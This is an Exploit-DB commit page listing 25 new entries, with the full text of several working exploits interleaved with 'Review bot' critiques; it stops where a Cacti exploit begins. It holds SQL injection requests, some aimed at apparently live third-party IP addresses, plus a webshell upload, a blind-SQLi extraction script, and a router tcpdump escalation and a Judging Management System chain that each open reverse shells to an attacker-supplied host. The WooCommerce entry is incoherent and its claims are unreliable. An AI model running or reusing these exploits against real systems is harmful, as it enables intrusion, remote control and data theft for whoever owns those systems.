DB: 2023-04-01

25 changes to exploits/shellcodes/ghdb

EQ Enterprise management system v2.2.0 - SQL Injection

qubes-mirage-firewall  v0.8.3 - Denial Of Service (DoS)

ASKEY RTF3505VW-N1 - Privilege Escalation

Bangresto 1.0 - SQL Injection

Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)

Cacti v1.2.22 - Remote Command Execution (RCE)
Judging Management System v1.0 - Authentication Bypass
Judging Management System v1.0 - Remote Code Execution (RCE)

rconfig 3.9.7 - Sql Injection (Authenticated)

Senayan Library Management System v9.0.0 - SQL Injection

Spitfire CMS 1.0.475 - PHP Object Injection

Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)

WooCommerce v7.1.0 - Remote Code Execution(RCE)

CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x  -  Denial Of Service (DoS)
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x  - Authorization Bypass (IDOR)
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Exploit
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution (RCE)
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset
SOUND4 Server Service 4.1.102 - Local Privilege Escalation

macOS/x64 - Execve Null-Free Shellcode
Exploit-DB 2023-04-01 00:16:31 +00:00
parent 42ade901fe
commit 9b56e8731e
25 changed files with 1818 additions and 0 deletions


@ -0,0 +1,24 @@
Exploit Title: EQ Enterprise management system v2.2.0 - SQL Injection
Date: 2022.12.7
Exploit Author: TLF
Vendor Homepage: https://www.yiquantech.com/pc/about.html
Software Link(漏洞影响应用下载链接): http://121.8.146.131/,http://183.233.152.14:9000/,http://219.135.168.90:9527/,http://222.77.5.250:9000/,http://219.135.168.90:9530/
Version: EQ v1.5.31 to v2.2.0
Tested on: windows 10
CVE : CVE-2022-45297
POC:
POST /Account/Login HTTP/1.1
Host: 121.8.146.131
User-Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 118
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8 Cookie: ASP.NET_SessionId=tlipmh0zjgfdm5b4h1tgvolg
Origin: http://121.8.146.131
Referer: http://121.8.146.131/Account/Login
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
RememberPwd=false&ServerDB=EQ%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A0&UserNumber=%27&UserPwd=%27
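Review bot: The PoC hard-codes what look like live third-party deployments (the five addresses on the `Software Link` line, and `Host: 121.8.146.131` with matching `Origin` and `Referer`) together with a captured `ASP.NET_SessionId` cookie. An archived entry should carry placeholders instead, e.g. `Host: <target>` and `Cookie: ASP.NET_SessionId=<session>`, with the vendor page as the only software reference. The header also names no fixed release for CVE-2022-45297, so a line such as `Fixed in: <version, per vendor>` is needed to tell operators what to upgrade to. For detection and input validation, the request shows the injected value arriving in the `ServerDB` field of `POST /Account/Login`.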

24
exploits/hardware/dos/51157.py Executable file

@ -0,0 +1,24 @@
# Exploit Title: qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)
# Date: 2022-12-04
# Exploit Author: Krzysztof Burghardt <krzysztof@burghardt.pl>
# Vendor Homepage: https://mirage.io/blog/MSA03
# Software Link: https://github.com/mirage/qubes-mirage-firewall/releases
# Version: >= 0.8.0 & < 0.8.4
# Tested on: Qubes OS
# CVE: CVE-2022-46770
#PoC exploit from https://github.com/mirage/qubes-mirage-firewall/issues/166
#!/usr/bin/env python3
from socket import socket, AF_INET, SOCK_DGRAM
TARGET = "239.255.255.250"
PORT = 5353
PAYLOAD = b'a' * 607
s = socket(AF_INET, SOCK_DGRAM)
s.sendto(PAYLOAD, (TARGET, PORT))
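Review bot: The header gives the affected range (`>= 0.8.0 & < 0.8.4`) but never says which release carries the fix, so a reader has to infer it. If the upper bound means what it appears to, add `# Fixed in: 0.8.4 (see vendor advisory MSA03)` under the `# Version:` line. Separately, `#!/usr/bin/env python3` sits below the comment header, so on a file marked executable it is an ordinary comment rather than an interpreter line. The socket is also never closed; `with socket(AF_INET, SOCK_DGRAM) as s:` is the tidier form.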


@ -0,0 +1,67 @@
# Exploit Title: ASKEY RTF3505VW-N1 - Privilege escalation
# Date: 07-12-2022
# Exploit Author: Leonardo Nicolas Servalli
# Vendor Homepage: www.askey.com
# Platform: ASKEY router devices RTF3505VW-N1
# Tested on: Firmware BR_SV_g000_R3505VMN1001_s32_7
# Vulnerability analysis: https://github.com/leoservalli/Privilege-escalation-ASKEY/blob/main/README.md
#Description:
#----------
# Mitrastar ASKEY RTF3505VW-N1 devices are provided with access through ssh into a restricted default shell (credentials are on the back of the router and in some cases this routers use default credentials).
# The command “tcpdump” is present in the restricted shell and do not handle correctly the -z flag, so it can be used to escalate privileges through the creation of a local file in the /tmp directory of the router, and injecting packets through port 80 used for the router's Web GUI) with the string ";/bin/bash" in order to be executed by "-z sh". By using “;/bin/bash” as injected string we can spawn a busybox/ash console.
#Exploit:
#--------
#!/usr/bin/bash
if [ -z "$@" ]; then
echo "Command example: $0 routerIP routerUser routerPassword remoteIPshell remotePortShell "
exit 0
fi
for K in $(seq 1 15) # Attemps
do
echo "**************************************************************************************"
echo "******************************** Attempt number $K ************************************"
echo "**************************************************************************************"
for l in $(seq 1 200) ; do echo ";/bin/bash" | nc -p 8888 $1 80 ; done > /dev/null 2>&1 & # start a background loop injecting the string ";/bin/bash" on the port 80 of the router
# Expect script for interact with the router through SSH, login, launch the tcpdump with the option "-z sh", and finally launch a more stable busybox reverse shell to our listener
/usr/bin/expect << EOD
spawn ssh $2@$1
expect {
"password: " {
send "$3\r"
expect ">"
send -- "tcpdump -v -ln -i any -w /tmp/runme$K -W 1 -G 1 -z sh src port 8888\r" # filter by source port 8888
}
"yes/no" {
send "yes\r"
#exp_continue
}
}
set timeout 2
expect {
timeout {
puts "Timeout..."
send "exit\r"
exit 0
}
"*usy*ox" {
expect "#"
send "rm /tmp/runme* \r"
send "rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f | /bin/sh -i 2>&1|nc $4 $5 >/tmp/f \r"
puts "Rooted !!!!!!!!!"
set timeout -1
expect "NEVER_APPEARING_STRING#" # wait an infinite time to mantain the rverse shell open
}
}
EOD
done
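Review bot: The usage guard `if [ -z "$@" ]` only catches the zero-argument case; with any other argument count the test is either false or a syntax error, and the script carries on with whatever positional parameters it has. `if [ "$#" -ne 5 ]; then` checks what the usage line describes, and that branch should exit non-zero. The positional parameters are also expanded unquoted in the `nc` line and inside the heredoc. On the documentation side, the description names both preconditions (SSH access with label or default credentials, and `tcpdump` being available in the restricted shell) but no firmware that fixes it. A `# Mitigation:` comment telling owners to change the default credentials and keep SSH off untrusted networks would make the entry usable for people running these routers.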


@ -0,0 +1,27 @@
# Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code Execution(RCE)
# Date: 2022-12-07
# Author: Milad Karimi
# Vendor Homepage: https://wordpress.org/plugins/woocommerce
# Software Link: https://wordpress.org/plugins/woocommerce
# Tested on: windows 10 , firefox
# Version: 7.1.0
# CVE : N/A
# Description:
simple, easy to use jQuery frontend to php backend that pings various
devices and changes colors from green to red depending on if device is
up or down.
# PoC :
http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php
http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php
# Vulnerabile code:
 95: $classname $classname($post_id);
  94: $classname = WC_Product_Factory::get_product_classname($post_id, $product_type : 'simple');
    92:  function save($post_id, $post)
       93: $product_type = WC_Product_Factory::get_product_type($post_id) : sanitize_title(stripslashes($_POST['product-type']));
          92:  function save($post_id, $post)
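Review bot: The evidence in this entry does not support its title. The `# Description:` text describes an unrelated device-ping dashboard, and the same PoC URL is listed twice. That URL passes `product-type` in the query string of a class file, while the quoted code reads `$_POST['product-type']` through `sanitize_title(stripslashes(...))` and only uses it to choose a product class name; nothing shown reaches a shell. The "Vulnerabile code" excerpt is also not valid PHP as printed (the ternary `?` is missing). With `CVE : N/A` and no vendor reference, this should be treated as unverified until a trace from the parameter to a command sink is shown.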


@ -0,0 +1,139 @@
# Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://www.bludit.com/
# Version : 3-14-1
# Tested on: windows 11 wampserver | Kali linux
# Category: WebApp
# Google Dork: intext:'2022 Powered by Bludit'
# Date: 8.12.2022
######## Description ########
#
# Step 1 : Archive as a zip your webshell (example: payload.zip)
# Step 2 : Login admin account and download 'UploadPlugin'
# Step 3 : Go to UploadPlugin section
# Step 4 : Upload your zip
# Step 5 : target/bl-plugins/[your_payload]
#
######## Proof of Concept ########
==============> START REQUEST <========================================
POST /admin/plugin/uploadplugin HTTP/2
Host: localhost
Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------308003478615795926433430552264
Content-Length: 1820
Origin: https://036e-88-235-222-210.eu.ngrok.io
Dnt: 1
Referer: https://036e-88-235-222-210.eu.ngrok.io/admin/plugin/uploadplugin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="tokenCSRF"
b6487f985b68f2ac2c2d79b4428dda44696d6231
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="pluginorthemes"
plugins
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="zip_file"; filename="a.zip"
Content-Type: application/zip
PK †eˆU  a/PK  ”fˆUÆ ª)¢ Ä
a/a.phpíVێÓ0}ç+La BÛìVܖpX®ËJ @V꺭ƒíÒrûwl7É$mQyà‘<$©çÌÌ93ã¸È]ƒË·ï–óÒ=/. pÝãZ+M5/•¶BÎÈ0>©M†[jłÓB,„õtO̤Ҝ.
×4;’†e)¨ƒ¼Èה¯9[Z¡dðÆ „Œ&Âd<ó`÷+œN—’y¼Á
RLÉE¾(í7â}âø‡_‡¥æ3OºÈ'xð>A¯ p‚pânÁã¤ëÀ×e¡&œük£‹¼$Øj±ØFýâ…á@\@ªgxD¢Ì'áôæQ?½v£ŸöG7ñùZgéññõ“
j±u
\õ„±†à/ï¾Îޞ´×T™HÄZu™jœHkª‰È£û§gÑÅ,CÆêRâVjÅ5yùø%}q»ú­„Ä(ŽQK*Ë"Öï¡£;—Ò²·­6z²ZŸgXÊò¢ðíÄ'éûù+ñÌ%
µj,ÐäàN°ùf,_à8—“‹•˜lO€ScsmI«‡¬«H»¯*Sc?i”)i¹´&x@.'”<—¤Ûç]zs^a®·)‚hBz0;f rì‰þǸ0yÕU¥H"ÕÕÿI IØ\“t{có~€£ªä²Ë Ö÷š;dÁ³âÙlh†»s%Ç Ö8Nº+«}+Ž­ÿaºržŸŸžÂÂj.
îvWS²A¿O?nHO?›jžO ¤Ã£Q+ì¯æí^ Ï
e8©ô*Ô¾"ý¡@Ó2+ëÂ`÷
kC57j©"m
ã®ho¹ xŸô Û;’œcçzÙQ
Ë·[kô¿Ý¯-2ì~¨“æv©¥C€î‘Tþ#k2,UØSŽ¦€­OÁS£Øg˜‚úK †QˆÜ ØIϲòÖ`Ð:%F½$A"t;buOMr4Ýè~–eãΙåØXíÇm˜Ç(s 6A¸3,l>º…<N®¦q{s __~t6á¾,…ÅèçO´ÇÆ×Σv²±ãÿ‘Ú’‘Ug[;pq›eÓÜÅØÿéJ
Ë}êv‚3ð8´# ŠOµsÈO«ýbƒh±ï°Ÿd—Ë…¹ÿˆ>yþðMröâÁSzöæõÃûÏÜû)}óàeºqQRrf}êê_ D Ø0ìu’õv'§öø?@‡ êûOæh'˜Oœ8f—D¼5[à²=b~PK? †eˆU  $ €íA a/
  þš®,
Ù þš®,
Ù€ø¨j.
ÙPK?  ”fˆUÆ ª)¢ Ä
$ €¤ a/a.php
  ¤eÝ-
Ù ÷C-
Ù bj.
ÙPK   ­ ç
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="submit"
Upload
-----------------------------308003478615795926433430552264--
==============> END REQUEST <========================================
## WEB SHELL UPLOADED!
==============> START RESPONSE <========================================
HTTP/2 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Dec 2022 18:01:43 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Ngrok-Trace-Id: f3a92cc45b7ab0ae86e98157bb026ab4
Pragma: no-cache
Server: Apache/2.4.51 (Win64) PHP/7.4.26
X-Powered-By: Bludit
.
.
.
.
==============> END RESPONSE <========================================
# REQUEST THE WEB SHELL
==============> START REQUEST <========================================
GET /bl-plugins/a/a.php?cmd=whoami HTTP/2
Host: localhost
Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
==============> END REQUEST <========================================
==============> START RESPONSE <========================================
HTTP/2 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Dec 2022 18:13:14 GMT
Ngrok-Trace-Id: 30639fc66dcf46ebe29cc45cf1bf3919
Server: Apache/2.4.51 (Win64) PHP/7.4.26
X-Powered-By: PHP/7.4.26
Content-Length: 32
<pre>nt authority\system
</pre>
==============> END RESPONSE <========================================
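Review bot: The upload request embeds the raw bytes of `a.zip` in a text file, where they have turned into mojibake (the `PK …` run inside the `zip_file` part), so the archive can be neither inspected nor hashed from this listing. Replace that body with a one-line description of its contents, since the visible directory entries name only `a/` and `a/a.php`, and add a SHA-256 of the original file if an artefact reference is needed. The requests also carry a `BLUDIT-KEY` session cookie, a `tokenCSRF` value and an ngrok hostname from the author's environment, all of which should be placeholders. For defenders the useful fact is in the second request: a PHP file extracted under `/bl-plugins/` is served and executed directly, so blocking direct web requests to scripts under that path is the hardening to consider.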


@ -0,0 +1,62 @@
## Exploit Title: Senayan Library Management System v9.0.0 - SQL Injection
## Author: nu11secur1ty
## Date: 11.09.2022
## Vendor: https://slims.web.id/web/
## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi
## Description:
The manual insertion `point 3` with `class` parameter appears to be
vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\0absu0byc9uwy8ivftx7f6auul0fo5cwfk6at2hr.again.com\\fbe'))+'
was submitted in the manual insertion point 3.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The application interacted with that domain, indicating that the
injected SQL query was executed.
## STATUS: HIGH Vulnerability
[+] Payload:
```MySQL
---
Parameter: class (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
or GROUP BY clause
Payload: reportView=true&year=2002&class=bbbb''' RLIKE (SELECT
(CASE WHEN (2547=2547) THEN 0x626262622727 ELSE 0x28 END)) AND
'dLjf'='dLjf&membershipType=a&collType=aaaa
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi)
## Proof and Exploit:
[href](http://localhost:5001/sy5wji)
## Time spent
`03:00:00`
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
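Review bot: The report never names the vulnerable endpoint: the payload lists the query parameters (`reportView`, `year`, `class`, `membershipType`, `collType`) but no script path, and "manual insertion point 3" is scanner wording that means nothing outside the author's session. Add a line such as `## Endpoint: <path of the report script>` and state the affected parameter plainly, so maintainers know which query to parameterize. The `Proof and Exploit` link points at `http://localhost:5001/...`, which resolves for nobody else, and the signature block is pasted twice. The Bangresto 1.0 entry later on this page has the same gaps (no script path for `itemID`, duplicated signature).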


@ -0,0 +1,58 @@
# Exploit Title: Spitfire CMS 1.0.475 - PHP Object Injection
# Exploit Author: LiquidWorm
Vendor: Claus Muus
Product web page: http://spitfire.clausmuus.de
Affected version: 1.0.475
Summary: Spitfire is a system to manage the content of webpages.
Desc: The application is prone to a PHP Object Injection vulnerability
due to the unsafe use of unserialize() function. A potential attacker,
authenticated, could exploit this vulnerability by sending specially
crafted requests to the web application containing malicious serialized
input.
-----------------------------------------------------------------------
cms/edit/tpl_backup.inc.php:
----------------------------
47: private function status ()
48: {
49: $status = array ();
50:
51: $status['values'] = array ();
52: $status['values'] = isset ($_COOKIE['cms_backup_values']) ? unserialize ($_COOKIE['cms_backup_values']) : array ();
...
...
77: public function save ($values)
78: {
79: $values = array_merge ($this->status['values'], $values);
80: setcookie ('cms_backup_values', serialize ($values), time()+60*60*24*30);
81: }
-----------------------------------------------------------------------
Tested on: nginx
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5720
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5720.php
28.09.2022
--
> curl -isk -XPOST http://10.0.0.2/cms/edit/tpl_backup_action.php \
-H 'Content-Type: application/x-www-form-urlencoded'
-H 'Accept: */*'
-H 'Referer: http://10.0.0.2/cms/edit/cont_index.php?tpl=backup'
-H 'Accept-Encoding: gzip, deflate'
-H 'Accept-Language: en-US,en;q=0.9'
-H 'Connection: close' \
-H 'Cookie: tip=0; cms_backup_values=O%3a3%3a%22ZSL%22%3a0%3a%7b%7d; cms_username=admin; PHPSESSID=0e63d3a8762f4bff95050d1146db8c1c' \
--data 'action=save&&value=1'
#--data 'action=save&&value[files]={}'
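Review bot: The advisory pins the root cause precisely, `unserialize ($_COOKIE['cms_backup_values'])` at line 52 of `cms/edit/tpl_backup.inc.php`, but stops short of a remediation. A `Fix:` line would complete it: store the cookie as JSON (`json_encode` in `save()`, `json_decode(..., true)` in `status()`), or at minimum call `unserialize($_COOKIE['cms_backup_values'], ['allowed_classes' => false])` and check that the result is an array. No fixed version is given either; if none exists, say so explicitly. In the `curl` block several `-H` lines lack the trailing `\` that the others have, though that may be a rendering artefact.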

76
exploits/php/webapps/51163.py Executable file

@ -0,0 +1,76 @@
# Exploit Title: rconfig 3.9.7 - Sql Injection (Authenticated)
# Exploit Author: azhen
# Date: 10/12/2022
# Vendor Homepage: https://www.rconfig.com/
# Software Link: https://www.rconfig.com/
# Vendor: rConfig
# Version: <= v3.9.7
# Tested against Server Host: Linux
# CVE: CVE-2022-45030
import requests
import sys
import urllib3
urllib3.disable_warnings()
s = requests.Session()
# sys.argv.append("192.168.10.150") #Enter the hostname
if len(sys.argv) != 2:
print("Usage: python3 rconfig_sqli_3.9.7.py <host>")
sys.exit(1)
host=sys.argv[1] #Enter the hostname
def get_data(host):
print("[+] Get db data...")
vul_url = "https://"+host+":443/lib/ajaxHandlers/ajaxCompareGetCmdDates.php?deviceId=-1&command='+union+select+concat(1000%2bord(substr({},{},1)),'-1-1')%20--%20"
query_exp = "database()"
result_data = ""
for i in range(1, 100):
burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate"}
res = requests.get(vul_url.format(query_exp, i), cookies=s.cookies,verify=False)
# print(res.text)
a = chr(int(res.text[6:10]) - 1000)
if a == '\x00':
break
result_data += a
print(result_data)
print("[+] Database name: {}".format(result_data))
'''
output:
[+] Logging in...
[+] Get db data...
r
rc
rco
rcon
rconf
rconfi
rconfig
rconfigd
rconfigdb
[+] Database name: rconfigdb
'''
def login(host):
print("[+] Logging in...")
url = "https://"+host+":443/lib/crud/userprocess.php"
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"}
data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin
response=s.post(url, headers=headers, cookies=s.cookies, data=data, verify=False)
get_data(host)
login(host)
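Review bot: TLS verification is switched off unconditionally, with `verify=False` on both requests plus `urllib3.disable_warnings()`, while `login()` posts a username and password; certificate checking should be the default and disabling it an explicit option. `get_data()` also calls `requests.get(...)` rather than `s.get(...)`, rebuilds `burp0_headers` on every iteration without using it, and passes `res.text[6:10]` to `int()` with no handling for a response that is not in the expected shape. The header gives `Version: <= v3.9.7` but no fixed release, which defenders need. The request does make clear that the unsanitised input is the `command` parameter of `ajaxCompareGetCmdDates.php`. Indentation has been lost in this rendering, so the structure of the function bodies cannot be checked here.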

118
exploits/php/webapps/51164.py Executable file

@ -0,0 +1,118 @@
# Exploit Title: Judging Management System v1.0 - Remote Code Execution (RCE)
# Date: 12/11/2022
# Exploit Author: Angelo Pio Amirante
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 on XAAMP server
import requests,argparse,re,time,base64
import urllib.parse
from colorama import (Fore as F,Back as B,Style as S)
from bs4 import BeautifulSoup
BANNER = """
Judging Management System v1.0 - Auth Bypass + Unrestricted File Upload = Remote Code Execution (RCE)
"""
def argsetup():
desc = S.BRIGHT + 'Judging Management System v1.0 - Remote Code Execution (RCE)'
parser = argparse.ArgumentParser(description=desc)
parser.add_argument('-t', '--target', help='Target URL, Ex: http://localhost/php-jms', required=True)
parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True)
parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True)
args = parser.parse_args()
return args
# Performs Auth bypass in order to get the admin cookie
def auth_bypass(args):
print(F.CYAN+"[+] Login into the application through Auth Bypass vulnerability...")
session = requests.Session()
loginUrl = f"{args.target}/login.php"
username = """' OR 1=1-- -"""
password = "randomvalue1234"
data = {'username': username, 'password': password}
login = session.post(loginUrl,verify=False,data=data)
admin_cookie = login.cookies['PHPSESSID']
print(F.GREEN+"[+] Admin cookies obtained !!!")
return admin_cookie
# Checks if the file has been uploaded to /uploads directory
def check_file(args,cookie):
uploads_endpoint = f"{args.target}/uploads/"
cookies = {'PHPSESSID': f'{cookie}'}
req = requests.get(uploads_endpoint,verify=False,cookies=cookies)
soup = BeautifulSoup(req.text,features='html.parser')
files = soup.find_all("a")
for i in range (len(files)):
match = re.search(".*-shelljudgesystem\.php",files[i].get('href'))
if match:
file = files[i].get('href')
print(F.CYAN+"[+] The webshell is at the following Url: "+f"{args.target}/uploads/"+file)
return file
return None
def file_upload(args,cookie):
now = int(time.time())
endpoint = f"{args.target}/edit_organizer.php"
cookies = {'wp-settings-time-1':f"{now}",'PHPSESSID': f'{cookie}'}
get_req = requests.get(endpoint,verify=False,cookies=cookies)
soup = BeautifulSoup(get_req.text,features='html.parser')
username = soup.find("input",{"name":"username"}).get('value')
admin_password = soup.find("input",{"id":"password"}).get('value')
print(F.GREEN + "[+] Admin username: " + username)
print(F.GREEN + "[+] Admin password: " + admin_password)
# Multi-part request
file_dict = {
'fname':(None,"Random"),
'mname':(None,"Random"),
'lname':(None,"Random"),
'email':(None,"ranom@mail.com"),
'pnum':(None,"014564343"),
'cname':(None,"Random"),
'caddress':(None,"Random"),
'ctelephone':(None,"928928392"),
'cemail':(None,"company@mail.com"),
'cwebsite':(None,"http://company.com"),
'file':("shelljudgesystem.php","<?php system($_REQUEST['cmd']) ?>","application/octet-stream"),
'username':(None,f"{admin_password}"),
'passwordx':(None,f"{admin_password}"),
'password2x':(None,f"{admin_password}"),
'password':(None,f"{admin_password}"),
'update':(None,"")
}
req = requests.post(endpoint,verify=False,cookies=cookies,files=file_dict)
def exploit(args,cookie,file):
payload = f"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient('{args.listenip}',{args.listenport})%3b"""+"""$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()" """
uploads_endpoint = f"{args.target}/uploads/{file}?cmd={payload}"
cookies = {'PHPSESSID': f'{cookie}'}
print(F.GREEN + "\n[+] Enjoy your reverse shell ")
requests.get(uploads_endpoint,verify=False,cookies=cookies)
if __name__ == '__main__':
print(F.CYAN + BANNER)
args = argsetup()
cookie=auth_bypass(args=args)
file_upload(args=args,cookie=cookie)
file_name=check_file(args=args,cookie=cookie)
if file_name is not None:
exploit(args=args,cookie=cookie,file=file_name)
else:
print(F.RED + "[!] File not found")
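Review bot: In `file_upload()` the form field `'username'` is filled with `admin_password` rather than the `username` value read earlier in the same function, so running this against a test instance rewrites the administrator's login name; it should read `'username':(None,f"{username}")`. The script also prints the recovered admin password and leaves the uploaded `*-shelljudgesystem.php` file in `/uploads/` with no cleanup step, which matters on a shared lab system. The pattern in `check_file()` is a non-raw string containing `\.` and should be `r".*-shelljudgesystem\.php"`. The header names no remediation: the two weaknesses the script relies on are, apparently, string-built SQL in `login.php` and an upload handler behind `edit_organizer.php` that accepts `.php` files, and the companion Authentication Bypass entry below shares the first.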


@ -0,0 +1,36 @@
# Exploit Title: Judging Management System v1.0 - Authentication Bypass
# Date: 12/11/2022
# Exploit Author: Angelo Pio Amirante
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 on XAAMP server
# Vulnerability: An attacker can bypass login page and access to dashboard page
# Vulnerable file: login.php
# Exploit:
1) Go to: http://localhost/php-jms/index.php
2) As username use this payload: 'or 1=1-- -
3) Use random words for password
POST /php-jms/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Origin: http://localhost
Connection: close
Referer: http://localhost/php-jms/index.php
Cookie: wp-settings-time-1=1669938282; _pk_id.1.1fff=9c7644c9d84f46f1.1670232782.
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
username=%27or+1%3D1--+-&password=asa

69
exploits/php/webapps/51166.py Executable file

@ -0,0 +1,69 @@
# Exploit Title: Cacti v1.2.22 - Remote Command Execution (RCE)
# Exploit Author: Riadh BOUCHAHOUA
# Discovery Date: 2022-12-08
# Vendor Homepage: https://www.cacti.net/
# Software Links : https://github.com/Cacti/cacti
# Tested Version: 1.2.2x <= 1.2.22
# CVE: CVE-2022-46169
# Tested on OS: Debian 10/11
#!/usr/bin/env python3
import random
import httpx, urllib
class Exploit:
def __init__(self, url, proxy=None, rs_host="",rs_port=""):
self.url = url
